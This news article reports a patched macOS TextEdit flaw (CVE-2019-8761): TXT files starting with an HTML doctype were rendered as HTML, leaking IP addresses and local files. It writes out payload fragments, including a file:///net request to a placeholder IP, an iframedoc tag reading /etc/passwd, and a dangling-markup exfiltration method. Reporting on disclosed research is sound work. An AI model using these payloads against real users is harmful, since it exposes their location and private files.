UPDATED A macOS vulnerability enabled attackers to execute malicious HTML within TXT files that, if opened by victims, could leak their IP address and, worse still, give access to local files.
Now patched, the security flaw stemmed from how TXT files were parsed by TextEdit, the open source Apple application that opens TXT files by default.
Despite this development – and the 2019 discovery of memory corruption bugs leading to RCE in Microsoft’s equivalent text editor, Notepad – antivirus software, firewalls, and MacOS Gatekeeper treat TXT files “as safe downloads that can’t possibly be malicious” because they supposedly contain only text, said security researcher Paulos Yibelo in a blog post.
“They shouldn’t blindly trust TXT files,” the researcher tells The Daily Swig. Regardless of a file’s extension, “what interprets the file and how it is interpreted matters more than anything” .TXT or any other extension “can be malicious if PHP includes it as code,” he adds.
‘Lots of potential attack vectors’
Resolving to explore this underestimated attack vector, Yibelo found that basic customizations made on TextEdit, such as making text bold or italicized, are parsed using the RTF format.
Testing then revealed that TextEdit could be tricked into thinking an opened .TXT file was in fact an RTF-HTML file. If a TXT file began with <!DOCTYPE HTML><html><head></head><body>, TextEdit parsed the HTML, thus permitting the injection of limited HTML and opening up “lots of potential attack vectors”.
Leaking the IP address
Acting on this discovery, the researcher then found that macOS Gatekeeper, which is designed to only allow trusted software to run, failed to quarantine a TXT file force-downloaded from the Tor browser that, once opened, leaked the victim’s IP address without their knowledge.
“This is why I use my fully Tor-ified network rather than just Tor Browser,” tweeted HardenedBSD co-founder Shawn Webb in response to the research. “There’s absolutely zero chance for info leakage.”
TextEdit apparently conducted “very limited parsing” on the HTML and many “interesting” HTML attributes were unavailable, said Yibelo.
Fuzzing revealed that CSS property <style> @import { “url “} </style> was allowed to load local CSS files, and the only scheme that worked – file:/// – blocked external requests, but not the opening of other locally stored files.
Yibelo noted that macOS automount, which is used to manage mount points for directory mounting application autofs, permitted file:/// URLs to issue remote requests.
He added that automount can also make remote requests to an external drive, so that ‘ls/net/EXAMPLE.com’ forces [macOS to] send a remote request to EXAMPLE.com.
“While they did a good job blocking TextEdit from making external requests, this was the one thing [Apple] forgot when they allowed file:/// scheme, on OSX file:///net/11.22.33.44/a.css connects to 11.22.33.44.”
Since automount uses the kernel to make TCP connections, even if the victim used a proxy their real IP address would still be leaked.
“Allowing unprivileged users [to] automatically mount network resources unchecked is a rather huge security vulnerability,” Shawn Webb also said in his Twitter thread on the research. “None of my systems have autofs/automount enabled for this reason.”
Yibelo also previewed an upcoming browser exploit that means force-downloaded TXT files can “be opened without user interaction or warning” and leak the “IP straight out of Tor browser.”
Low-dangling fruit
Another HTML attribute that loaded local files – <iframedoc> – meant an attacker could embed local files using <iframedoc src=”file:///etc/passwd”> and view the TXT file’s contents.
Yibelo then mounted a dangling markup attack, a scriptless data leaking technique used when dynamic scripting is disabled.
“By combining the <style> CSS attribute with the <iframedoc> attribute, an attacker can first include an unclosed style tag, embed the contents of the file they want to steal, and then leak the content as dangling parameters to their evil site as soon as the file is open,” he explained.
“Given how simple it is to exploit, I’d give it a high CVSS,” said the researcher.
Shawn Webb also said: “These days, there aren’t many text editors that will just edit text and do nothing more,” before adding: As security researchers, we’re left with dumping the contents of the file with a simple hex editor and parsing each hex character ourselves. That is, at least, if you need to be incredibly careful. Adjust according to your threat models and accepted risks.”
‘Improved checks’
Yibelo reported the bug in 2019 and CVE-2019-8761 said the “issue was addressed with improved checks” implemented in Security Update 2019-001 for macOS Catalina 10.15.1 and Security Update 2019-006 for macOS Catalina 10.15.
This article was updated on April 6 with additional comments from Paulos Yibelo and Shawn Webb.
The Daily Swig has also contacted Apple for comment and we will update the article if and when we hear back.
Source: https://portswigger.net/daily-swig/apple-macos-textedit-parsing-flaw-leaked-local-files-via-dangling-markup-injection